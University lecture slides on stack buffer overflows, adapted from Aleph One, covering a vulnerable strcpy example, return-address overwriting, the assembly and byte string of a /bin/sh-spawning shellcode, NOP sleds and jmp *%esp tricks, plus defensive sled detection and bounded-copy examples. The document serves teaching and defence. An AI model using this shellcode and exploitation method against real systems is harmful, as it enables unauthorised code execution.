Lecture 9: Buffer Overflow*
CS 392/6813: Computer Security Fall 2010
Nitesh Saxena
*Adapted from a previous lecture by Aleph One (Smashing the Stack for Fun and Profit) and Stanislav Nurilov
04/19/23 Lecture 9 - Buffer Overflow 2
Course Admin
- Mid-terms graded
- 392 average: 48; 6813 average: 70
- HW4 solution to be posted; HW4 to be graded
- HW5 will be posted very soon
Why study buffer overflow?
- Buffer overflow vulnerabilities are the most commonly exploited: they account for about half of all new security problems (CERT)
- They are relatively easy to exploit
- There are many variations on the stack smash: heap overflows, etc.
- We'll focus on static buffer overflow vulnerabilities
Recall the Security Life Cycle
- Threats
- Policy
- Specification
- Design
- Implementation
- Operation and Maintenance
Which stage?
How a Computer Works
- There is a processor that interfaces with various devices
- The processor executes instructions: add, sub, mult, jump and various functions
Where do the instructions come from?
- Each process "thinks" that it has 4GB (2^32 bytes) of (virtual) memory (assuming a 32-bit processor)
- Instructions are loaded into memory; the processor fetches and executes them one by one
- How does the processor know where to return after "jumping", and after returning from a function?
Process Memory Organization
Function Calls
Buffer Overflow: Example
```c
#include <string.h>

void function(char *str) {
    char buffer[8];
    strcpy(buffer, str);        /* no length check: str may be far longer than 8 bytes */
}

int main(void) {
    char large_string[256];
    int i;
    for (i = 0; i < 255; i++)
        large_string[i] = 'A';
    large_string[255] = '\0';   /* terminate, so strcpy stops after 255 bytes */
    function(large_string);     /* 255 bytes copied into an 8-byte buffer */
    return 0;
}
```
Buffer Overflows
Modifying the Execution Flow
```c
#include <stdio.h>

void function(void) {
    char buffer1[4];
    int *ret;
    ret = (int *)(buffer1 + 8);   /* assumes the return address sits 8 bytes above buffer1
                                     (the lecture's 32-bit, unoptimized stack layout) */
    (*ret) += 8;                  /* advance the saved return address past "x = 1" */
}

int main(void) {
    int x = 0;
    function();
    x = 1;                        /* skipped when the return address was advanced */
    printf("%d\n", x);
    return 0;
}
```
Exploiting Overflows: Smashing the Stack
- So, we can modify the flow of execution. What do we want to do now?
- Spawn a shell and issue commands from it
Exploiting Overflows: Smashing the Stack
- What if there is no code to spawn a shell in the program we are exploiting?
- Place the code in the buffer we are overflowing, and set the return address to point back to the buffer!
Spawning a Shell
```c
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>     /* execve */

int main(void) {
    char *name[2];
    name[0] = "/bin/sh";
    name[1] = NULL;     /* argv is {"/bin/sh", NULL} */
    execve(name[0], name, NULL);
    exit(0);
}
```
GDB → assembly code: compile this program and disassemble it in GDB to obtain the assembly on the next slide.
Spawning a Shell
```c
/* 32-bit x86 Linux only (build with gcc -m32). The jmp/call operands are
 * reproduced as written in the lecture (and in Aleph One's paper); the
 * assembled bytes appear on the next slide. */
int main(void) {
    __asm__(
        "jmp    0x2a\n\t"              /* forward to the call, which pushes the string's address */
        "popl   %esi\n\t"              /* esi = address of "/bin/sh" */
        "movl   %esi,0x8(%esi)\n\t"    /* argv[0] = pointer to "/bin/sh" */
        "movb   $0x0,0x7(%esi)\n\t"    /* NUL-terminate the string */
        "movl   $0x0,0xc(%esi)\n\t"    /* argv[1] = NULL */
        "movl   $0xb,%eax\n\t"         /* syscall 11 = execve */
        "movl   %esi,%ebx\n\t"         /* ebx = path */
        "leal   0x8(%esi),%ecx\n\t"    /* ecx = argv */
        "leal   0xc(%esi),%edx\n\t"    /* edx = envp (NULL) */
        "int    $0x80\n\t"             /* execve(path, argv, envp) */
        "movl   $0x1, %eax\n\t"        /* syscall 1 = exit */
        "movl   $0x0, %ebx\n\t"        /* status 0 */
        "int    $0x80\n\t"
        "call   -0x2f\n\t"             /* back to popl; pushes the address of the string below */
        ".string \"/bin/sh\""
    );
    return 0;
}
```
GDB → binary code: the bytes of these instructions, read back in GDB, give the shellcode string on the next slide.
Spawning a Shell
```c
char shellcode[] =
    "\xeb\x2a\x5e\x89\x76\x08\xc6\x46\x07\x00\xc7\x46\x0c\x00\x00\x00"
    "\x00\xb8\x0b\x00\x00\x00\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80"
    "\xb8\x01\x00\x00\x00\xbb\x00\x00\x00\x00\xcd\x80\xe8\xd1\xff\xff"
    "\xff\x2f\x62\x69\x6e\x2f\x73\x68\x00\x89\xec\x5d\xc3";
```
How to find the Shellcode
1. Guess
- time consuming
- being wrong by 1 byte will lead to a segmentation fault or an invalid instruction
2. Pad the shellcode with NOPs, then guess
- we don't need to land exactly on it
- much more efficient
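A defender's counterpart to the NOP-padding trick above, added here as an example that is not part of the lecture: the property that makes a NOP sled forgiving for the attacker (a long run of identical 0x90 bytes) also makes it easy to flag in input that is supposed to be text. The field size (8 bytes), the sled threshold (16 bytes) and the sample inputs are constructed for the example.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define NOP 0x90u   /* single-byte x86 NOP used as sled padding */

/* Length of the longest run of consecutive NOP bytes in buf. */
size_t longest_nop_run(const uint8_t *buf, size_t len) {
    size_t best = 0, run = 0;
    for (size_t i = 0; i < len; i++) {
        run = (buf[i] == NOP) ? run + 1 : 0;
        if (run > best)
            best = run;
    }
    return best;
}

/* Number of bytes that are neither printable ASCII nor ordinary whitespace.
 * A field meant to hold text (a name, a path) should contain none. */
size_t nonprintable_count(const uint8_t *buf, size_t len) {
    size_t n = 0;
    for (size_t i = 0; i < len; i++) {
        uint8_t c = buf[i];
        int printable = (c >= 0x20 && c <= 0x7e) || c == '\n' || c == '\r' || c == '\t';
        if (!printable)
            n++;
    }
    return n;
}

/* Validation policy for a text field whose receiving buffer holds max_len bytes.
 * Returns 0 when the input is acceptable, otherwise a bit mask of reasons:
 *   1: longer than the receiving buffer allows (the length check from the prevention slide)
 *   2: contains a NOP run of at least sled_min bytes
 *   4: contains bytes that cannot appear in text */
int check_text_input(const uint8_t *buf, size_t len, size_t max_len, size_t sled_min) {
    int reasons = 0;
    if (len > max_len)
        reasons |= 1;
    if (longest_nop_run(buf, len) >= sled_min)
        reasons |= 2;
    if (nonprintable_count(buf, len) > 0)
        reasons |= 4;
    return reasons;
}

/* Constructed sample: 48 NOPs followed by 16 bytes of 0xcc (int3) standing in
 * for a payload. Writes into out (at least 64 bytes) and returns the length. */
size_t make_sample_sled(uint8_t *out) {
    memset(out, NOP, 48);
    memset(out + 48, 0xcc, 16);
    return 64;
}

int main(void) {
    const uint8_t name[] = "alice";              /* constructed benign input */
    uint8_t sled[64];
    size_t sled_len = make_sample_sled(sled);

    printf("\"alice\": reasons=%d\n", check_text_input(name, 5, 8, 16));
    printf("sled:     longest NOP run=%zu, reasons=%d\n",
           longest_nop_run(sled, sled_len), check_text_input(sled, sled_len, 8, 16));
    return 0;
}
```

The length check alone (reason bit 1) is what stops the overflow; the sled and non-printable checks are there because a field that carries machine code never passes as text, so they give a detection signal even where the length limit is generous.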
Can we do better? If we can find the address the SP (stack pointer) points to, we are home.
Can we do better?
- Find out what shared libraries are used by the vulnerable program: use the ldd command. This also gives the starting address at which each shared library is mapped in the process's memory
- Find out where in the shared library the instruction jmp *%esp occurs
- Add this offset to the starting address of the shared library
- At %esp, store the instruction jmp -<constant offset>
Consider the simple program
Stack Contents – Normal Execution
Stack Contents – buffer overflow
How to prevent buffer overflows
- Programmer level: check the length of the input; use bounded functions such as strncpy (instead of strcpy)
- OS level: techniques such as address space layout randomization (ASLR)
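To make the programmer-level advice concrete, and to show what the strcpy example earlier in the lecture does to the word stored just above the buffer, here is an added example (not code from the lecture or from Aleph One's paper). It models one frame as a byte array: an 8-byte buffer followed by a 4-byte "saved" word standing in for the saved frame pointer or return address, so the overrun is visible and well-defined instead of a crash. The sentinel value 0xDEADBEEF and the inputs are constructed.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Model of one stack frame: an 8-byte buffer immediately followed by the
 * 4-byte word the function needs intact when it returns. */
#define BUF_SIZE   8
#define FRAME_SIZE (BUF_SIZE + 4)
#define SAVED_WORD 0xDEADBEEFu            /* constructed sentinel */

struct frame { uint8_t mem[FRAME_SIZE]; };

static void frame_init(struct frame *f) {
    uint32_t w = SAVED_WORD;
    memset(f->mem, 0, sizeof f->mem);
    memcpy(f->mem + BUF_SIZE, &w, sizeof w);   /* saved word sits right after the buffer */
}

static uint32_t frame_saved_word(const struct frame *f) {
    uint32_t w;
    memcpy(&w, f->mem + BUF_SIZE, sizeof w);
    return w;
}

/* strcpy-style copy: stops at the NUL and never consults BUF_SIZE. The cap at
 * FRAME_SIZE only keeps the model inside its own array; the real strcpy has no
 * cap and keeps writing into whatever lies above. Returns bytes written. */
static size_t copy_unbounded(struct frame *f, const char *src) {
    size_t i;
    for (i = 0; src[i] != '\0' && i < FRAME_SIZE; i++)
        f->mem[i] = (uint8_t)src[i];
    if (i < FRAME_SIZE)
        f->mem[i] = 0;                           /* strcpy also writes the terminator */
    return i;
}

/* The slide's programmer-level fix: check the length, then copy with a bound.
 * strncpy does not NUL-terminate when it truncates, so the terminator is
 * written explicitly. Returns 0 on success, -1 when the input is rejected. */
static int copy_bounded(struct frame *f, const char *src) {
    if (strlen(src) >= BUF_SIZE)
        return -1;                               /* too long: refuse rather than overflow */
    strncpy((char *)f->mem, src, BUF_SIZE - 1);
    f->mem[BUF_SIZE - 1] = '\0';
    return 0;
}

/* Saved word after running input through the vulnerable copy. */
uint32_t saved_word_after_unbounded(const char *input) {
    struct frame f;
    frame_init(&f);
    copy_unbounded(&f, input);
    return frame_saved_word(&f);
}

/* Status of the bounded copy for the same input; saved word via *saved. */
int saved_word_after_bounded(const char *input, uint32_t *saved) {
    struct frame f;
    int rc;
    frame_init(&f);
    rc = copy_bounded(&f, input);
    *saved = frame_saved_word(&f);
    return rc;
}

int main(void) {
    const char *attack = "AAAAAAAAAAAA";       /* constructed 12-byte input for an 8-byte buffer */
    uint32_t saved;
    int rc;
    printf("unbounded: saved word = 0x%08x\n", saved_word_after_unbounded(attack));
    rc = saved_word_after_bounded(attack, &saved);
    printf("bounded:   rc=%d, saved word = 0x%08x\n", rc, saved);
    return 0;
}
```

Two details worth noticing: the unbounded copy corrupts the saved word even for an input of exactly 8 characters, because the terminating NUL lands one byte past the buffer; and the bounded version rejects oversized input outright instead of silently truncating, which is the safer default when the caller does not expect a shortened value.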
References
- Smashing the Stack for Fun and Profit: http://doc.bughunter.net/buffer-overflow/smash-stack.html
- Smashing the Modern Stack for Fun and Profit: http://netsec.cs.northwestern.edu/media/readings/modern_stack_smashing.pdf
Announcement
CS6903: Modern Cryptography, Spring 2011, Wednesdays 5:30-8pm
http://cis.poly.edu/~nsaxena/docs/crypto-outline.pdf